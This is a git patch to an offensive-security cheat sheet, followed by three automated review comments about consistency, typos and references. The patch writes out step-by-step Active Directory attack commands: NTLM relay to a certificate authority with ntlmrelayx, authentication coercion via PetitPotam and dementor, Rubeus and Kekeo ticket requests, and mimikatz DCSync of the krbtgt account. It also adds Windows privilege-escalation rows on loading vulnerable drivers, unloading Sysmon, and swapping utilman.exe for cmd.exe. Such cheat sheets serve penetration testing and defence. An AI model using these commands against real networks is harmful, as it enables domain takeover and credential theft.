From 3a4bd977625632fbf8ae10ba28755a74423a9235 Mon Sep 17 00:00:00 2001 From: Swissky <12152583+swisskyrepo@users.noreply.github.com> Date: Sun, 25 Jul 2021 11:40:19 +0200 Subject: [PATCH] AD CS - Mimikatz / Rubeus --- .../Active Directory Attack.md | 45 +++++++++++++------ .../Windows - Privilege Escalation.md | 3 +- 2 files changed, 34 insertions(+), 14 deletions(-) diff --git a/Methodology and Resources/Active Directory Attack.md b/Methodology and Resources/Active Directory Attack.md index 10b7cf4..b4c8b11 100644 --- a/Methodology and Resources/Active Directory Attack.md +++ b/Methodology and Resources/Active Directory Attack.md 
@@ -1737,27 +1737,46 @@ Using a modified version of ntlmrelayx : https://shenaniganslabs.io/files/impack ntlmrelayx -smb2support --no-smb-server --gpotato-startup rat.exe ``` - #### AD CS Relay Attack -https://github.com/SecureAuthCorp/impacket/pull/1101 +Require [Impacket PR #1101](https://github.com/SecureAuthCorp/impacket/pull/1101) -1. Run the ntlmrelayx.py and set your Certificate Authority (CA) as a target - ```powershell - python3 ntlmrelayx.py -t http:///certsrv/certfnsh.asp -smb2support --adcs - python3 ntlmrelayx.py -t http://cs1.lab.local/certsrv/certfnsh.asp -smb2support --adcs - ``` -2. Exploit the print spooler bug +* Version 1: NTLM Relay + Rubeus + PetitPotam ```powershell + impacket> python3 ntlmrelayx.py -t http:///certsrv/certfnsh.asp -smb2support --adcs + impacket> python3 ./examples/ntlmrelayx.py -t http://10.10.10.10/certsrv/certfnsh.asp -smb2support --adcs --template workstation + # template workstation, DomainController, Machine + + # Coerce the authentication via MS-ESFRPC EfsRpcOpenFileRaw function with petitpotam + # You can also use any other way to coerce the authentication like printspooler + git clone https://github.com/topotam/PetitPotam + python3 petitpotam.py -d $DOMAIN -u $USER -p $PASSWORD $ATTACKER_IP $TARGET_IP + python3 petitpotam.py -d '' -u '' -p '' $ATTACKER_IP $TARGET_IP python3 dementor.py -u -p -d python3 dementor.py 10.10.10.250 10.10.10.10 -u user1 -p Password1 -d lab.local - ``` -3. 
Request the TGT using the certificate - ```powershell + + # Use the certificate with rubeus to request a TGT Rubeus.exe asktgt /user: /certificate: /ptt - Rubeus.exe asktgt /user:dc1$ /certificate:MIIRdQIBAzCC......NfrHtUUXS /ptt + Rubeus.exe asktgt /user:dc1$ /certificate:MIIRdQIBAzC...mUUXS /ptt + + # Now you can use the TGT to perform a DCSync + mimikatz> lsadump::dcsync /user:krbtgt + ``` + +* Version 2: NTLM Relay + Mimikatz + Kekeo + ```powershell + impacket> python3 ./examples/ntlmrelayx.py -t http://10.10.10.10/certsrv/certfnsh.asp -smb2support --adcs --template DomainController + + # Mimikatz + mimikatz> misc::efs /server:dc.lab.local /connect: /noauth + + # Kekeo + kekeo> base64 /input:on + kekeo> tgt::ask /pfx: /user:dc$ /domain:lab.local /ptt + + # Mimikatz + mimikatz> lsadump::dcsync /user:krbtgt ``` -4. Now you can DCSync with the DC machine account ### Dangerous Built-in Groups Usage diff --git a/Methodology and Resources/Windows - Privilege Escalation.md b/Methodology and Resources/Windows - Privilege Escalation.md index bde930e..d8cb00a 100644 --- a/Methodology and Resources/Windows - Privilege Escalation.md +++ b/Methodology and Resources/Windows - Privilege Escalation.md @@ -976,7 +976,7 @@ Full privileges cheatsheet at https://github.com/gtworek/Priv2Admin, summary bel |`SeBackup`| **Threat** | ***Built-in commands*** | Read sensitve files with `robocopy /b` |- May be more interesting if you can read %WINDIR%\MEMORY.DMP

- `SeBackupPrivilege` (and robocopy) is not helpful when it comes to open files.

- Robocopy requires both SeBackup and SeRestore to work with /b parameter. | |`SeCreateToken`| ***Admin*** | 3rd party tool | Create arbitrary token including local admin rights with `NtCreateToken`. || |`SeDebug`| ***Admin*** | **PowerShell** | Duplicate the `lsass.exe` token. | Script to be found at [FuzzySecurity](https://github.com/FuzzySecurity/PowerShell-Suite/blob/master/Conjure-LSASS.ps1) | -|`SeLoadDriver`| ***Admin*** | 3rd party tool | 1. Load buggy kernel driver such as `szkg64.sys`
2. Exploit the driver vulnerability

Alternatively, the privilege may be used to unload security-related drivers with `ftlMC` builtin command. i.e.: `fltMC sysmondrv` | 1. The `szkg64` vulnerability is listed as [CVE-2018-15732](https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2018-15732)
2. The `szkg64` [exploit code](https://www.greyhathacker.net/?p=1025) was created by [Parvez Anwar](https://twitter.com/parvezghh) | +|`SeLoadDriver`| ***Admin*** | 3rd party tool | 1. Load buggy kernel driver such as `szkg64.sys` or `capcom.sys`
2. Exploit the driver vulnerability

Alternatively, the privilege may be used to unload security-related drivers with `ftlMC` builtin command. i.e.: `fltMC sysmondrv` | 1. The `szkg64` vulnerability is listed as [CVE-2018-15732](https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2018-15732)
2. The `szkg64` [exploit code](https://www.greyhathacker.net/?p=1025) was created by [Parvez Anwar](https://twitter.com/parvezghh) | |`SeRestore`| ***Admin*** | **PowerShell** | 1. Launch PowerShell/ISE with the SeRestore privilege present.
2. Enable the privilege with [Enable-SeRestorePrivilege](https://github.com/gtworek/PSBits/blob/master/Misc/EnableSeRestorePrivilege.ps1)).
3. Rename utilman.exe to utilman.old
4. Rename cmd.exe to utilman.exe
5. Lock the console and press Win+U| Attack may be detected by some AV software.

Alternative method relies on replacing service binaries stored in "Program Files" using the same privilege. | |`SeTakeOwnership`| ***Admin*** | ***Built-in commands*** |1. `takeown.exe /f "%windir%\system32"`
2. `icalcs.exe "%windir%\system32" /grant "%username%":F`
3. Rename cmd.exe to utilman.exe
4. Lock the console and press Win+U| Attack may be detected by some AV software.

Alternative method relies on replacing service binaries stored in "Program Files" using the same privilege. | |`SeTcb`| ***Admin*** | 3rd party tool | Manipulate tokens to have local admin rights included. May require SeImpersonate.

To be verified. || @@ -1314,3 +1314,4 @@ Because (in this example) "C:\Program Files\nodejs\" is _before_ "C:\WINDOWS\sys * [Windows Exploitation Tricks: Exploiting Arbitrary File Writes for Local Elevation of Privilege - James Forshaw, Project Zero - Wednesday, April 18, 2018](https://googleprojectzero.blogspot.com/2018/04/windows-exploitation-tricks-exploiting.html) * [Weaponizing Privileged File Writes with the USO Service - Part 2/2 - itm4n - August 19, 2019](https://itm4n.github.io/usodllloader-part2/) * [Hacking Trick: Environment Variable $Path Interception y Escaladas de Privilegios para Windows](https://www.elladodelmal.com/2020/03/hacking-trick-environment-variable-path.html?m=1) +* [Abusing SeLoadDriverPrivilege for privilege escalation - 14 - JUN - 2018 - OSCAR MALLO](https://www.tarlogic.com/en/blog/abusing-seloaddriverprivilege-for-privilege-escalation/)
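Review bot: In the Version 1 block (hunk at `@@ -1737`) the relay command uses `--template workstation` while the following Rubeus step requests a TGT for the DC account (`/user:dc1$`) and then runs `lsadump::dcsync`; Version 2 uses `--template DomainController` for the same outcome. The comment `# template workstation, DomainController, Machine` lists the options without saying which one applies to which coerced account, so either state that mapping or use `DomainController` in both versions so the two walkthroughs agree. Minor: `Require [Impacket PR #1101]` should read `Requires`. A one-line note for defenders would also round out the section, since the relay only succeeds when the `certsrv` web enrollment endpoint accepts NTLM without Extended Protection for Authentication; enforcing EPA over HTTPS on that endpoint blocks both versions.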
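Review bot: The rewritten `SeLoadDriver` row (hunk at `@@ -976`) adds `capcom.sys` to the list of buggy drivers, but the notes column on the same line still documents only `szkg64` (the CVE-2018-15732 link and the exploit-code credit); add a matching reference for `capcom.sys`, for example the Tarlogic article appended to the references at the end of this patch, so both examples are documented the same way. The row also carries over the typo `ftlMC` for the filter-manager command even though the example right after it correctly uses `fltMC sysmondrv`; fix it while touching this line. The unchanged context in the same table has `sensitve` and `icalcs.exe` (the tool is `icacls.exe`), which could be corrected in a follow-up.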
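Review bot: The new reference entry (hunk at `@@ -1314`) `Abusing SeLoadDriverPrivilege for privilege escalation - 14 - JUN - 2018 - OSCAR MALLO` does not follow the `Title - Author - Date` order and casing used by the surrounding entries (e.g. `... - itm4n - August 19, 2019`); suggest `Abusing SeLoadDriverPrivilege for privilege escalation - Oscar Mallo - June 14, 2018`.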